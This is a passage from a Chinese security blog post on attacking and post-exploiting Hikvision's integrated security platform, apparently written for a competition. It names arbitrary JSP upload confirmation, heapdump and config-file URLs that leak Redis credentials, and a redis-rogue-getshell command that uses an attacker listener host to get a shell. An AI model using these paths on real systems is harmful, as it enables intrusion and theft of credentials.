专栏名称: 黑白之道
黑白之道,普及网络安全知识!
目录
相关文章推荐
国家金融监督管理总局  ·  《经济金融领域年度网络辟谣榜》发布 ·  昨天  
国家金融监督管理总局  ·  《经济金融领域年度网络辟谣榜》发布 ·  昨天  
财联社AI daily  ·  “折价”卖身腾讯音乐后,喜马拉雅宣布拥抱AI ·  昨天  
新郑发布  ·  下架!微信最新公告! ·  昨天  
云技术  ·  140万元,DeepSeek大模型大单:贵州 ... ·  2 天前  
云技术  ·  140万元,DeepSeek大模型大单:贵州 ... ·  2 天前  
科技日报  ·  我国首套,填补技术空白! ·  2 天前  
科技日报  ·  我国首套,填补技术空白! ·  2 天前  
51好读  ›  专栏  ›  黑白之道

记一次海康综合安防后渗透

黑白之道  · 公众号  · 互联网安全  · 2024-10-12 09:59

正文

请到「今天看啥」查看全文


Content-Length: 69 Connection: keep-alive traceId: f570d6a8d329cece Set-Cookie: JSESSIONID=30885E6D014929B496EDC9635ABA8EF8; Path=/svm; secure; HttpOnly;secure Cache-Control: no-cache Cache-Control: no-store Cache-Control: must-revalidate Pragma: no-cache Expires: 0 Access-Control-Allow-Origin: http://xx.xx.xx.xx:11443/center Access-Control-Allow-Credentials: true Access-Control-Allow-Methods: POST, GET, OPTIONS, DELETE, PUT,PATCH, HEAD Access-Control-Allow-Headers: Content-Type Access-Control-Max-Age: 3600
{"code":"0x26e31402","msg":"上报的文件格式错误","data":null}


然后访问https://xx.xx.xx.xx:11443/els/static/1.jsp,响应内容如下,则可以确定存在任意文件上传漏洞,并且能够解析jsp脚本

HTTP/1.1 200 Date: Fri, 21 Jun 2024 21:33:58 GMTContent-Type: text/html;charset=ISO-8859-1Connection: keep-aliveSet-Cookie: JSESSIONID=E81E46F2D575A51BEA3260243454C81B; Path=/els; secure; HttpOnly;secureContent-Length: 24
Vulnerability is exist


redis主从复制getshell

通过heapdump泄露

访问https://xx.xx.xx.xx:11443/artemis-portal/artemis/heapdump,如下下载了heapdump文件,那么就可以通过解密来获取运行中的配置,获取redis服务的password、port


通过portal配置文件泄露

请求https://xx.xx.xx.xx:11443/portal/conf/config.properties,正常返回配置文件,portalcache开头的字段为redis数据库配置


再通过主从复制的项目来执行命令

https://github.com/vulhub/redis-rogue-getshell

python redis-master.py -r <rhost> -p <rport> -L <lhost> -P <lport> -f RedisModulesSDK/exp.so -c "id"

即可完成getshell


2

后渗透


讲完入口点后,就可以收集里面的信息了


来到/opt/hikvision/web/components路径下,这里是设备中的应用安装路径,每个应用中的配置文件路径:conf/config.properties,查看文件就可以获取一系列应用服务的配置,取得服务权限来得分。(配置文件解密工具 GitHub - wafinfo/Hikvision: 海康威视综合安防平台后渗透利用工具







请到「今天看啥」查看全文